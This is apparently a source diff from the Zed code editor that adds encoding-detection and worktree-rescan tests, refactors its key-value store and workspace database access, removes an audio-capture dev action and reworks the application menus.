+ bytes.truncate(FILE_ANALYSIS_BYTES);
+
+ let result = analyze_byte_content(&bytes);
+ assert_eq!(
+ result,
+ ByteContent::Binary,
+ "BE 16-bit binary with control characters should be detected as Binary"
+ );
+ }
+
+ #[test]
+ fn test_utf16le_text_detected_as_utf16le() {
+ let text = "Hello, world! This is a UTF-16 test string. ";
+ let mut bytes = Vec::new();
+ while bytes.len() < FILE_ANALYSIS_BYTES {
+ bytes.extend(text.encode_utf16().flat_map(|u| u.to_le_bytes()));
+ }
+ bytes.truncate(FILE_ANALYSIS_BYTES);
+
+ assert_eq!(analyze_byte_content(&bytes), ByteContent::Utf16Le);
+ }
+
+ #[test]
+ fn test_utf16be_text_detected_as_utf16be() {
+ let text = "Hello, world! This is a UTF-16 test string. ";
+ let mut bytes = Vec::new();
+ while bytes.len() < FILE_ANALYSIS_BYTES {
+ bytes.extend(text.encode_utf16().flat_map(|u| u.to_be_bytes()));
+ }
+ bytes.truncate(FILE_ANALYSIS_BYTES);
+
+ assert_eq!(analyze_byte_content(&bytes), ByteContent::Utf16Be);
+ }
+
+ #[test]
+ fn test_known_binary_headers() {
+ let cases: &[(&[u8], &str)] = &[
+ (b"RIFF\x00\x00\x00\x00WAVE", "WAV"),
+ (b"RIFF\x00\x00\x00\x00AVI ", "AVI"),
+ (b"OggS\x00\x02", "OGG"),
+ (b"fLaC\x00\x00", "FLAC"),
+ (b"ID3\x03\x00", "MP3 ID3v2"),
+ (b"\xFF\xFB\x90\x00", "MP3 MPEG1 Layer3"),
+ (b"\xFF\xF3\x90\x00", "MP3 MPEG2 Layer3"),
+ ];
+
+ for (header, label) in cases {
+ let mut bytes = header.to_vec();
+ bytes.resize(FILE_ANALYSIS_BYTES, 0x41); // pad with 'A'
+ assert_eq!(
+ analyze_byte_content(&bytes),
+ ByteContent::Binary,
+ "{label} should be detected as Binary"
+ );
+ }
+ }
}
@@ -409,6 +409,164 @@ async fn test_renaming_case_only(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+async fn test_root_rescan_reconciles_stale_state(cx: &mut TestAppContext) {
+ init_test(cx);
+ let fs = FakeFs::new(cx.background_executor.clone());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "old.txt": "",
+ }),
+ )
+ .await;
+
+ let tree = Worktree::local(
+ Path::new("/root"),
+ true,
+ fs.clone(),
+ Default::default(),
+ true,
+ WorktreeId::from_proto(0),
+ &mut cx.to_async(),
+ )
+ .await
+ .unwrap();
+
+ cx.read(|cx| tree.read(cx).as_local().unwrap().scan_complete())
+ .await;
+
+ tree.read_with(cx, |tree, _| {
+ assert_eq!(
+ tree.entries(true, 0)
+ .map(|entry| entry.path.as_ref())
+ .collect::<Vec<_>>(),
+ vec![rel_path(""), rel_path("old.txt")]
+ );
+ });
+
+ fs.pause_events();
+ fs.remove_file(Path::new("/root/old.txt"), RemoveOptions::default())
+ .await
+ .unwrap();
+ fs.insert_file(Path::new("/root/new.txt"), Vec::new()).await;
+ assert_eq!(fs.buffered_event_count(), 2);
+ fs.clear_buffered_events();
+
+ tree.read_with(cx, |tree, _| {
+ assert!(tree.entry_for_path(rel_path("old.txt")).is_some());
+ assert!(tree.entry_for_path(rel_path("new.txt")).is_none());
+ });
+
+ fs.emit_fs_event("/root", Some(fs::PathEventKind::Rescan));
+ fs.unpause_events_and_flush();
+ tree.flush_fs_events(cx).await;
+
+ tree.read_with(cx, |tree, _| {
+ assert!(tree.entry_for_path(rel_path("old.txt")).is_none());
+ assert!(tree.entry_for_path(rel_path("new.txt")).is_some());
+ assert_eq!(
+ tree.entries(true, 0)
+ .map(|entry| entry.path.as_ref())
+ .collect::<Vec<_>>(),
+ vec![rel_path(""), rel_path("new.txt")]
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_subtree_rescan_reports_unchanged_descendants_as_updated(cx: &mut TestAppContext) {
+ init_test(cx);
+ let fs = FakeFs::new(cx.background_executor.clone());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "dir": {
+ "child.txt": "",
+ "nested": {
+ "grandchild.txt": "",
+ },
+ "remove": {
+ "removed.txt": "",
+ }
+ },
+ "other.txt": "",
+ }),
+ )
+ .await;
+
+ let tree = Worktree::local(
+ Path::new("/root"),
+ true,
+ fs.clone(),
+ Default::default(),
+ true,
+ WorktreeId::from_proto(0),
+ &mut cx.to_async(),
+ )
+ .await
+ .unwrap();
+
+ cx.read(|cx| tree.read(cx).as_local().unwrap().scan_complete())
+ .await;
+
+ let tree_updates = Arc::new(Mutex::new(Vec::new()));
+ tree.update(cx, |_, cx| {
+ let tree_updates = tree_updates.clone();
+ cx.subscribe(&tree, move |_, _, event, _| {
+ if let Event::UpdatedEntries(update) = event {
+ tree_updates.lock().extend(
+ update
+ .iter()
+ .filter(|(path, _, _)| path.as_ref() != rel_path("fs-event-sentinel"))
+ .map(|(path, _, change)| (path.clone(), *change)),
+ );
+ }
+ })
+ .detach();
+ });
+ fs.pause_events();
+ fs.insert_file("/root/dir/new.txt", b"new content".to_vec())
+ .await;
+ fs.remove_dir(
+ "/root/dir/remove".as_ref(),
+ RemoveOptions {
+ recursive: true,
+ ignore_if_not_exists: false,
+ },
+ )
+ .await
+ .unwrap();
+ fs.clear_buffered_events();
+ fs.unpause_events_and_flush();
+
+ fs.emit_fs_event("/root/dir", Some(fs::PathEventKind::Rescan));
+ tree.flush_fs_events(cx).await;
+
+ assert_eq!(
+ mem::take(&mut *tree_updates.lock()),
+ &[
+ (rel_path("dir").into(), PathChange::Updated),
+ (rel_path("dir/child.txt").into(), PathChange::Updated),
+ (rel_path("dir/nested").into(), PathChange::Updated),
+ (
+ rel_path("dir/nested/grandchild.txt").into(),
+ PathChange::Updated
+ ),
+ (rel_path("dir/new.txt").into(), PathChange::Added),
+ (rel_path("dir/remove").into(), PathChange::Removed),
+ (
+ rel_path("dir/remove/removed.txt").into(),
+ PathChange::Removed
+ ),
+ ]
+ );
+
+ tree.read_with(cx, |tree, _| {
+ assert!(tree.entry_for_path(rel_path("other.txt")).is_some());
+ });
+}
+
#[gpui::test]
async fn test_open_gitignored_files(cx: &mut TestAppContext) {
init_test(cx);
@@ -2,7 +2,7 @@
description = "The fast, collaborative code editor."
edition.workspace = true
name = "zed"
-version = "0.228.0"
+version = "0.230.0"
publish.workspace = true
license = "GPL-3.0-or-later"
authors = ["Zed Team <hi@zed.dev>"]
@@ -7,12 +7,14 @@ fn main() {
// Add rpaths for libraries that webrtc-sys dlopens at runtime.
// This is mostly required for hosts with non-standard SO installation
// locations such as NixOS.
- let dlopened_libs = ["libva", "libva-drm"];
+ let dlopened_libs = ["libva", "libva-drm", "egl"];
let mut rpath_dirs = std::collections::BTreeSet::new();
for lib in &dlopened_libs {
if let Some(libdir) = pkg_config::get_variable(lib, "libdir").ok() {
rpath_dirs.insert(libdir);
+ } else {
+ eprintln!("zed build.rs: {lib} not found in pkg-config's path");
}
}
@@ -14,7 +14,7 @@ use client::{Client, ProxySettings, UserStore, parse_zed_link};
use collab_ui::channel_view::ChannelView;
use collections::HashMap;
use crashes::InitCrashHandler;
-use db::kvp::{GLOBAL_KEY_VALUE_STORE, KEY_VALUE_STORE};
+use db::kvp::{GlobalKeyValueStore, KeyValueStore};
use editor::Editor;
use extension::ExtensionHostProxy;
use fs::{Fs, RealFs};
@@ -325,12 +325,16 @@ fn main() {
let app =
Application::with_platform(gpui_platform::current_platform(false)).with_assets(Assets);
+ let app_db = db::AppDatabase::new();
let system_id = app.background_executor().spawn(system_id());
- let installation_id = app.background_executor().spawn(installation_id());
- let session_id = Uuid::new_v4().to_string();
- let session = app
+ let installation_id = app
.background_executor()
- .spawn(Session::new(session_id.clone()));
+ .spawn(installation_id(KeyValueStore::from_app_db(&app_db)));
+ let session_id = Uuid::new_v4().to_string();
+ let session = app.background_executor().spawn(Session::new(
+ session_id.clone(),
+ KeyValueStore::from_app_db(&app_db),
+ ));
crashes::init(
InitCrashHandler {
@@ -451,7 +455,8 @@ fn main() {
});
app.run(move |cx| {
- let db_trusted_paths = match workspace::WORKSPACE_DB.fetch_trusted_worktrees() {
+ cx.set_global(app_db);
+ let db_trusted_paths = match workspace::WorkspaceDb::global(cx).fetch_trusted_worktrees() {
Ok(trusted_paths) => trusted_paths,
Err(e) => {
log::error!("Failed to do initial trusted worktrees fetch: {e:#}");
@@ -1300,42 +1305,37 @@ async fn authenticate(client: Arc<Client>, cx: &AsyncApp) -> Result<()> {
async fn system_id() -> Result<IdType> {
let key_name = "system_id".to_string();
+ let db = GlobalKeyValueStore::global();
- if let Ok(Some(system_id)) = GLOBAL_KEY_VALUE_STORE.read_kvp(&key_name) {
+ if let Ok(Some(system_id)) = db.read_kvp(&key_name) {
return Ok(IdType::Existing(system_id));
}
let system_id = Uuid::new_v4().to_string();
- GLOBAL_KEY_VALUE_STORE
- .write_kvp(key_name, system_id.clone())
- .await?;
+ db.write_kvp(key_name, system_id.clone()).await?;
Ok(IdType::New(system_id))
}
-async fn installation_id() -> Result<IdType> {
+async fn installation_id(db: KeyValueStore) -> Result<IdType> {
let legacy_key_name = "device_id".to_string();
let key_name = "installation_id".to_string();
// Migrate legacy key to new key
- if let Ok(Some(installation_id)) = KEY_VALUE_STORE.read_kvp(&legacy_key_name) {
- KEY_VALUE_STORE
- .write_kvp(key_name, installation_id.clone())
- .await?;
- KEY_VALUE_STORE.delete_kvp(legacy_key_name).await?;
+ if let Ok(Some(installation_id)) = db.read_kvp(&legacy_key_name) {
+ db.write_kvp(key_name, installation_id.clone()).await?;
+ db.delete_kvp(legacy_key_name).await?;
return Ok(IdType::Existing(installation_id));
}
- if let Ok(Some(installation_id)) = KEY_VALUE_STORE.read_kvp(&key_name) {
+ if let Ok(Some(installation_id)) = db.read_kvp(&key_name) {
return Ok(IdType::Existing(installation_id));
}
let installation_id = Uuid::new_v4().to_string();
- KEY_VALUE_STORE
- .write_kvp(key_name, installation_id.clone())
- .await?;
+ db.write_kvp(key_name, installation_id.clone()).await?;
Ok(IdType::New(installation_id))
}
@@ -1344,6 +1344,7 @@ pub(crate) async fn restore_or_create_workspace(
app_state: Arc<AppState>,
cx: &mut AsyncApp,
) -> Result<()> {
+ let kvp = cx.update(|cx| KeyValueStore::global(cx));
if let Some((multi_workspaces, remote_workspaces)) = restorable_workspaces(cx, &app_state).await
{
let mut results: Vec<Result<(), Error>> = Vec::new();
@@ -1452,7 +1453,7 @@ pub(crate) async fn restore_or_create_workspace(
.await?;
}
}
- } else if matches!(KEY_VALUE_STORE.read_kvp(FIRST_OPEN), Ok(None)) {
+ } else if matches!(kvp.read_kvp(FIRST_OPEN), Ok(None)) {
cx.update(|cx| show_onboarding_view(app_state, cx)).await?;
} else {
cx.update(|cx| {
@@ -1488,7 +1489,8 @@ async fn restorable_workspaces(
let (remote_workspaces, local_workspaces) = locations
.into_iter()
.partition(|sw| matches!(sw.location, SerializedWorkspaceLocation::Remote(_)));
- let multi_workspaces = workspace::read_serialized_multi_workspaces(local_workspaces);
+ let multi_workspaces =
+ cx.update(|cx| workspace::read_serialized_multi_workspaces(local_workspaces, cx));
Some((multi_workspaces, remote_workspaces))
}
@@ -1496,7 +1498,12 @@ pub(crate) async fn restorable_workspace_locations(
cx: &mut AsyncApp,
app_state: &Arc<AppState>,
) -> Option<Vec<SessionWorkspace>> {
- let mut restore_behavior = cx.update(|cx| WorkspaceSettings::get(None, cx).restore_on_startup);
+ let (mut restore_behavior, db) = cx.update(|cx| {
+ (
+ WorkspaceSettings::get(None, cx).restore_on_startup,
+ workspace::WorkspaceDb::global(cx),
+ )
+ });
let session_handle = app_state.session.clone();
let (last_session_id, last_session_window_stack) = cx.update(|cx| {
@@ -1519,7 +1526,7 @@ pub(crate) async fn restorable_workspace_locations(
match restore_behavior {
workspace::RestoreOnStartupBehavior::LastWorkspace => {
- workspace::last_opened_workspace_location(app_state.fs.as_ref())
+ workspace::last_opened_workspace_location(&db, app_state.fs.as_ref())
.await
.map(|(workspace_id, location, paths)| {
vec![SessionWorkspace {
@@ -1535,6 +1542,7 @@ pub(crate) async fn restorable_workspace_locations(
let ordered = last_session_window_stack.is_some();
let mut locations = workspace::last_session_workspace_locations(
+ &db,
&last_session_id,
last_session_window_stack,
app_state.fs.as_ref(),
@@ -103,10 +103,11 @@ use {
feature_flags::FeatureFlagAppExt as _,
git_ui::project_diff::ProjectDiff,
gpui::{
- App, AppContext as _, Bounds, KeyBinding, Modifiers, SharedString, VisualTestAppContext,
+ App, AppContext as _, Bounds, Entity, KeyBinding, Modifiers, VisualTestAppContext,
WindowBounds, WindowHandle, WindowOptions, point, px, size,
},
image::RgbaImage,
+ project::{AgentId, Project},
project_panel::ProjectPanel,
settings::{NotifyWhenAgentWaiting, Settings as _},
settings_ui::SettingsWindow,
@@ -1958,13 +1959,14 @@ impl AgentServer for StubAgentServer {
ui::IconName::ZedAssistant
}
- fn name(&self) -> SharedString {
+ fn agent_id(&self) -> AgentId {
"Visual Test Agent".into()
}
fn connect(
&self,
_delegate: AgentServerDelegate,
+ _project: Entity<Project>,
_cx: &mut App,
) -> gpui::Task<gpui::Result<Rc<dyn AgentConnection>>> {
gpui::Task::ready(Ok(Rc::new(self.connection.clone())))
@@ -2658,8 +2660,8 @@ fn run_multi_workspace_sidebar_visual_tests(
.context("Failed to create sidebar")?;
multi_workspace_window
- .update(cx, |multi_workspace, window, cx| {
- multi_workspace.register_sidebar(sidebar.clone(), window, cx);
+ .update(cx, |multi_workspace, _window, cx| {
+ multi_workspace.register_sidebar(sidebar.clone(), cx);
})
.context("Failed to register sidebar")?;
@@ -3190,8 +3192,8 @@ edition = "2021"
.context("Failed to create sidebar")?;
workspace_window
- .update(cx, |multi_workspace, window, cx| {
- multi_workspace.register_sidebar(sidebar.clone(), window, cx);
+ .update(cx, |multi_workspace, _window, cx| {
+ multi_workspace.register_sidebar(sidebar.clone(), cx);
})
.context("Failed to register sidebar")?;
@@ -3488,7 +3490,7 @@ edition = "2021"
// Insert a message into the active thread's message editor and submit.
let thread_view = cx
- .read(|cx| panel.read(cx).as_active_thread_view(cx))
+ .read(|cx| panel.read(cx).active_thread_view(cx))
.ok_or_else(|| anyhow::anyhow!("No active thread view"))?;
cx.update_window(workspace_window.into(), |_, window, cx| {
@@ -3557,7 +3559,7 @@ edition = "2021"
new_workspace.read(cx).panel::<AgentPanel>(cx)
})?;
if let Some(new_panel) = new_panel {
- let new_thread_view = cx.read(|cx| new_panel.read(cx).as_active_thread_view(cx));
+ let new_thread_view = cx.read(|cx| new_panel.read(cx).active_thread_view(cx));
if let Some(new_thread_view) = new_thread_view {
cx.update_window(workspace_window.into(), |_, window, cx| {
let message_editor = new_thread_view.read(cx).message_editor.clone();
@@ -17,7 +17,7 @@ use agent_ui::{AgentDiffToolbar, AgentPanelDelegate};
use anyhow::Context as _;
pub use app_menus::*;
use assets::Assets;
-use audio::{AudioSettings, REPLAY_DURATION};
+
use breadcrumbs::Breadcrumbs;
use client::zed_urls;
use collections::VecDeque;
@@ -69,7 +69,7 @@ use settings::{
update_settings_file,
};
use sidebar::Sidebar;
-use std::time::Duration;
+
use std::{
borrow::Cow,
path::{Path, PathBuf},
@@ -84,9 +84,7 @@ use util::rel_path::RelPath;
use util::{ResultExt, asset_str, maybe};
use uuid::Uuid;
use vim_mode_setting::VimModeSetting;
-use workspace::notifications::{
- NotificationId, SuppressEvent, dismiss_app_notification, show_app_notification,
-};
+use workspace::notifications::{NotificationId, dismiss_app_notification, show_app_notification};
use workspace::{
AppState, MultiWorkspace, NewFile, NewWindow, OpenLog, Panel, Toast, Workspace,
@@ -94,8 +92,7 @@ use workspace::{
notifications::simple_message_notification::MessageNotification, open_new,
};
use workspace::{
- CloseIntent, CloseProject, CloseWindow, NotificationFrame, RestoreBanner,
- with_active_or_new_workspace,
+ CloseIntent, CloseProject, CloseWindow, RestoreBanner, with_active_or_new_workspace,
};
use workspace::{Pane, notifications::DetachAndPromptErr};
use zed_actions::{
@@ -144,10 +141,6 @@ actions!(
actions!(
dev,
[
- /// Stores last 30s of audio from zed staff using the experimental rodio
- /// audio system (including yourself) on the current call in a tar file
- /// in the current working directory.
- CaptureRecentAudio,
/// Opens a prompt to enter a URL to open.
OpenUrlPrompt,
]
@@ -163,21 +156,24 @@ pub fn init(cx: &mut App) {
cx.on_action(quit);
cx.on_action(|_: &RestoreBanner, cx| title_bar::restore_banner(cx));
- let flag = cx.wait_for_flag::<PanicFeatureFlag>();
- cx.spawn(async |cx| {
- if cx.update(|cx| ReleaseChannel::global(cx) == ReleaseChannel::Dev) || flag.await {
- cx.update(|cx| {
- cx.on_action(|_: &TestPanic, _| panic!("Ran the TestPanic action"))
- .on_action(|_: &TestCrash, _| {
- unsafe extern "C" {
- fn puts(s: *const i8);
- }
- unsafe {
- puts(0xabad1d3a as *const i8);
- }
- });
- });
- };
+
+ cx.observe_flag::<PanicFeatureFlag, _>({
+ let mut added = false;
+ move |enabled, cx| {
+ if added || !enabled {
+ return;
+ }
+ added = true;
+ cx.on_action(|_: &TestPanic, _| panic!("Ran the TestPanic action"))
+ .on_action(|_: &TestCrash, _| {
+ unsafe extern "C" {
+ fn puts(s: *const i8);
+ }
+ unsafe {
+ puts(0xabad1d3a as *const i8);
+ }
+ });
+ }
})
.detach();
cx.on_action(|_: &OpenLog, cx| {
@@ -395,7 +391,7 @@ pub fn initialize_workspace(
let sidebar =
cx.new(|cx| Sidebar::new(multi_workspace_handle.clone(), window, cx));
multi_workspace_handle.update(cx, |multi_workspace, cx| {
- multi_workspace.register_sidebar(sidebar, window, cx);
+ multi_workspace.register_sidebar(sidebar, cx);
});
})
.ok();
@@ -1078,37 +1074,54 @@ fn register_actions(
})
.register_action({
let app_state = Arc::downgrade(&app_state);
- move |_, _: &CloseProject, window, cx| {
+ move |_workspace, _: &CloseProject, window, cx| {
let Some(window_handle) = window.window_handle().downcast::<MultiWorkspace>() else {
return;
};
if let Some(app_state) = app_state.upgrade() {
- open_new(
- workspace::OpenOptions {
- replace_window: Some(window_handle),
- ..Default::default()
- },
- app_state,
- cx,
- |workspace, window, cx| {
- cx.activate(true);
- // Create buffer synchronously to avoid flicker
- let project = workspace.project().clone();
- let buffer = project.update(cx, |project, cx| {
- project.create_local_buffer("", None, true, cx)
- });
- let editor = cx.new(|cx| {
- Editor::for_buffer(buffer, Some(project), window, cx)
- });
- workspace.add_item_to_active_pane(
- Box::new(editor),
- None,
- true,
- window,
- cx,
- );
- },
- )
+ cx.spawn_in(window, async move |this, cx| {
+ let should_continue = this
+ .update_in(cx, |workspace, window, cx| {
+ workspace.prepare_to_close(
+ CloseIntent::ReplaceWindow,
+ window,
+ cx,
+ )
+ })?
+ .await?;
+ if should_continue {
+ let task = cx.update(|_window, cx| {
+ open_new(
+ workspace::OpenOptions {
+ replace_window: Some(window_handle),
+ ..Default::default()
+ },
+ app_state,
+ cx,
+ |workspace, window, cx| {
+ cx.activate(true);
+ let project = workspace.project().clone();
+ let buffer = project.update(cx, |project, cx| {
+ project.create_local_buffer("", None, true, cx)
+ });
+ let editor = cx.new(|cx| {
+ Editor::for_buffer(buffer, Some(project), window, cx)
+ });
+ workspace.add_item_to_active_pane(
+ Box::new(editor),
+ None,
+ true,
+ window,
+ cx,
+ );
+ },
+ )
+ })?;
+ task.await
+ } else {
+ Ok(())
+ }
+ })
.detach_and_log_err(cx);
}
}
@@ -1128,9 +1141,6 @@ fn register_actions(
.detach_and_log_err(cx);
}
}
- })
- .register_action(|workspace, _: &CaptureRecentAudio, window, cx| {
- capture_recent_audio(workspace, window, cx);
});
#[cfg(not(target_os = "windows"))]
@@ -2121,84 +2131,6 @@ fn open_settings_file(
.detach_and_log_err(cx);
}
-fn capture_recent_audio(workspace: &mut Workspace, _: &mut Window, cx: &mut Context<Workspace>) {
- struct CaptureRecentAudioNotification {
- focus_handle: gpui::FocusHandle,
- save_result: Option<Result<(PathBuf, Duration), anyhow::Error>>,
- _save_task: Task<anyhow::Result<()>>,
- }
-
- impl gpui::EventEmitter<DismissEvent> for CaptureRecentAudioNotification {}
- impl gpui::EventEmitter<SuppressEvent> for CaptureRecentAudioNotification {}
- impl gpui::Focusable for CaptureRecentAudioNotification {
- fn focus_handle(&self, _cx: &App) -> gpui::FocusHandle {
- self.focus_handle.clone()
- }
- }
- impl workspace::notifications::Notification for CaptureRecentAudioNotification {}
-
- impl Render for CaptureRecentAudioNotification {
- fn render(&mut self, _window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
- let message = match &self.save_result {
- None => format!(
- "Saving up to {} seconds of recent audio",
- REPLAY_DURATION.as_secs(),
- ),
- Some(Ok((path, duration))) => format!(
- "Saved {} seconds of all audio to {}",
- duration.as_secs(),
- path.display(),
- ),
- Some(Err(e)) => format!("Error saving audio replays: {e:?}"),
- };
-
- NotificationFrame::new()
- .with_title(Some("Saved Audio"))
- .show_suppress_button(false)
- .on_close(cx.listener(|_, _, _, cx| {
- cx.emit(DismissEvent);
- }))
- .with_content(message)
- }
- }
-
- impl CaptureRecentAudioNotification {
- fn new(cx: &mut Context<Self>) -> Self {
- if AudioSettings::get_global(cx).rodio_audio {
- let executor = cx.background_executor().clone();
- let save_task = cx.default_global::<audio::Audio>().save_replays(executor);
- let _save_task = cx.spawn(async move |this, cx| {
- let res = save_task.await;
- this.update(cx, |this, cx| {
- this.save_result = Some(res);
- cx.notify();
- })
- });
-
- Self {
- focus_handle: cx.focus_handle(),
- _save_task,
- save_result: None,
- }
- } else {
- Self {
- focus_handle: cx.focus_handle(),
- _save_task: Task::ready(Ok(())),
- save_result: Some(Err(anyhow::anyhow!(
- "Capturing recent audio is only supported on the experimental rodio audio pipeline"
- ))),
- }
- }
- }
- }
-
- workspace.show_notification(
- NotificationId::unique::<CaptureRecentAudioNotification>(),
- cx,
- |cx| cx.new(CaptureRecentAudioNotification::new),
- );
-}
-
/// Eagerly loads the active theme and icon theme based on the selections in the
/// theme settings.
///
@@ -2441,7 +2373,7 @@ mod tests {
.update(cx, |multi_workspace, window, cx| {
multi_workspace.workspace().update(cx, |workspace, cx| {
assert_eq!(workspace.worktrees(cx).count(), 2);
- assert!(workspace.left_dock().read(cx).is_open());
+ assert!(workspace.right_dock().read(cx).is_open());
assert!(
workspace
.active_pane()
@@ -2500,7 +2432,7 @@ mod tests {
.collect::<Vec<_>>(),
&[Path::new(path!("/root/e")).into()]
);
- assert!(workspace.left_dock().read(cx).is_open());
+ assert!(workspace.right_dock().read(cx).is_open());
assert!(workspace.active_pane().focus_handle(cx).is_focused(window));
})
.unwrap();
@@ -3454,7 +3386,11 @@ mod tests {
PathBuf::from(path!("/root/.git/HEAD")),
PathBuf::from(path!("/root/excluded_dir/ignored_subdir")),
];
- let (opened_workspace, new_items) = cx
+ let workspace::OpenResult {
+ window: opened_workspace,
+ opened_items: new_items,
+ ..
+ } = cx
.update(|cx| {
workspace::open_paths(
&paths_to_open,
@@ -4890,6 +4826,7 @@ mod tests {
"task",
"terminal",
"terminal_panel",
+ "theme",
"theme_selector",
"toast",
"toolchain",
@@ -5877,7 +5814,9 @@ mod tests {
//
// Window A: workspace for dir1, workspace for dir2
// Window B: workspace for dir3
- let (window_a, _) = cx
+ let workspace::OpenResult {
+ window: window_a, ..
+ } = cx
.update(|cx| {
Workspace::new_local(
vec![dir1.into()],
@@ -5901,7 +5840,9 @@ mod tests {
.expect("failed to open second workspace into window A");
cx.run_until_parked();
- let (window_b, _) = cx
+ let workspace::OpenResult {
+ window: window_b, ..
+ } = cx
.update(|cx| {
Workspace::new_local(
vec![dir3.into()],
@@ -5931,9 +5872,11 @@ mod tests {
cx.run_until_parked();
// Verify all workspaces retained their session_ids.
- let locations = workspace::last_session_workspace_locations(&session_id, None, fs.as_ref())
- .await
- .expect("expected session workspace locations");
+ let db = cx.update(|cx| workspace::WorkspaceDb::global(cx));
+ let locations =
+ workspace::last_session_workspace_locations(&db, &session_id, None, fs.as_ref())
+ .await
+ .expect("expected session workspace locations");
assert_eq!(
locations.len(),
3,
@@ -5960,9 +5903,10 @@ mod tests {
});
// --- Read back from DB and verify grouping ---
- let locations = workspace::last_session_workspace_locations(&session_id, None, fs.as_ref())
- .await
- .expect("expected session workspace locations");
+ let locations =
+ workspace::last_session_workspace_locations(&db, &session_id, None, fs.as_ref())
+ .await
+ .expect("expected session workspace locations");
assert_eq!(locations.len(), 3, "expected 3 session workspaces");
@@ -31,6 +31,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
MenuItem::action("Toggle All Docks", workspace::ToggleAllDocks),
MenuItem::submenu(Menu {
name: "Editor Layout".into(),
+ disabled: false,
items: vec![
MenuItem::action("Split Up", workspace::SplitUp::default()),
MenuItem::action("Split Down", workspace::SplitDown::default()),
@@ -60,39 +61,31 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
vec![
Menu {
name: "Zed".into(),
+ disabled: false,
items: vec![
MenuItem::action("About Zed", zed_actions::About),
MenuItem::action("Check for Updates", auto_update::Check),
MenuItem::separator(),
- MenuItem::submenu(Menu {
- name: "Settings".into(),
- items: vec![
- MenuItem::action("Open Settings", zed_actions::OpenSettings),
- MenuItem::action("Open Settings File", super::OpenSettingsFile),
- MenuItem::action("Open Project Settings", zed_actions::OpenProjectSettings),
- MenuItem::action(
- "Open Project Settings File",
- super::OpenProjectSettingsFile,
- ),
- MenuItem::action("Open Default Settings", super::OpenDefaultSettings),
- MenuItem::separator(),
- MenuItem::action("Open Keymap", zed_actions::OpenKeymap),
- MenuItem::action("Open Keymap File", zed_actions::OpenKeymapFile),
- MenuItem::action(
- "Open Default Key Bindings",
- zed_actions::OpenDefaultKeymap,
- ),
- MenuItem::separator(),
- MenuItem::action(
- "Select Theme...",
- zed_actions::theme_selector::Toggle::default(),
- ),
- MenuItem::action(
- "Select Icon Theme...",
- zed_actions::icon_theme_selector::Toggle::default(),
- ),
- ],
- }),
+ MenuItem::submenu(Menu::new("Settings").items([
+ MenuItem::action("Open Settings", zed_actions::OpenSettings),
+ MenuItem::action("Open Settings File", super::OpenSettingsFile),
+ MenuItem::action("Open Project Settings", zed_actions::OpenProjectSettings),
+ MenuItem::action("Open Project Settings File", super::OpenProjectSettingsFile),
+ MenuItem::action("Open Default Settings", super::OpenDefaultSettings),
+ MenuItem::separator(),
+ MenuItem::action("Open Keymap", zed_actions::OpenKeymap),
+ MenuItem::action("Open Keymap File", zed_actions::OpenKeymapFile),
+ MenuItem::action("Open Default Key Bindings", zed_actions::OpenDefaultKeymap),
+ MenuItem::separator(),
+ MenuItem::action(
+ "Select Theme...",
+ zed_actions::theme_selector::Toggle::default(),
+ ),
+ MenuItem::action(
+ "Select Icon Theme...",
+ zed_actions::icon_theme_selector::Toggle::default(),
+ ),
+ ])),
MenuItem::separator(),
#[cfg(target_os = "macos")]
MenuItem::os_submenu("Services", gpui::SystemMenuType::Services),
@@ -113,6 +106,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "File".into(),
+ disabled: false,
items: vec![
MenuItem::action("New", workspace::NewFile),
MenuItem::action("New Window", workspace::NewWindow),
@@ -160,6 +154,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "Edit".into(),
+ disabled: false,
items: vec![
MenuItem::os_action("Undo", editor::actions::Undo, OsAction::Undo),
MenuItem::os_action("Redo", editor::actions::Redo, OsAction::Redo),
@@ -180,6 +175,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "Selection".into(),
+ disabled: false,
items: vec![
MenuItem::os_action(
"Select All",
@@ -227,10 +223,12 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "View".into(),
+ disabled: false,
items: view_items,
},
Menu {
name: "Go".into(),
+ disabled: false,
items: vec![
MenuItem::action("Back", workspace::GoBack),
MenuItem::action("Forward", workspace::GoForward),
@@ -262,6 +260,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "Run".into(),
+ disabled: false,
items: vec![
MenuItem::action(
"Spawn Task",
@@ -286,6 +285,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "Window".into(),
+ disabled: false,
items: vec![
MenuItem::action("Minimize", super::Minimize),
MenuItem::action("Zoom", super::Zoom),
@@ -294,6 +294,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "Help".into(),
+ disabled: false,
items: vec![
MenuItem::action(
"View Release Notes Locally",
@@ -5,7 +5,7 @@ use anyhow::{Context as _, Result, anyhow};
use cli::{CliRequest, CliResponse, ipc::IpcSender};
use cli::{IpcHandshake, ipc};
use client::{ZedLink, parse_zed_link};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::Editor;
use fs::Fs;
use futures::channel::mpsc::{UnboundedReceiver, UnboundedSender};
@@ -29,7 +29,7 @@ use util::ResultExt;
use util::paths::PathWithPosition;
use workspace::PathList;
use workspace::item::ItemHandle;
-use workspace::{AppState, MultiWorkspace, OpenOptions, SerializedWorkspaceLocation};
+use workspace::{AppState, MultiWorkspace, OpenOptions, OpenResult, SerializedWorkspaceLocation};
#[derive(Default, Debug)]
pub struct OpenRequest {
@@ -345,7 +345,11 @@ pub async fn open_paths_with_positions(
.map(|path_with_position| path_with_position.path.clone())
.collect::<Vec<_>>();
- let (multi_workspace, mut items) = cx
+ let OpenResult {
+ window: multi_workspace,
+ opened_items: mut items,
+ ..
+ } = cx
.update(|cx| workspace::open_paths(&paths, app_state, open_options, cx))
.await?;
@@ -487,7 +491,8 @@ async fn open_workspaces(
if grouped_locations.is_empty() {
// If we have no paths to open, show the welcome screen if this is the first launch
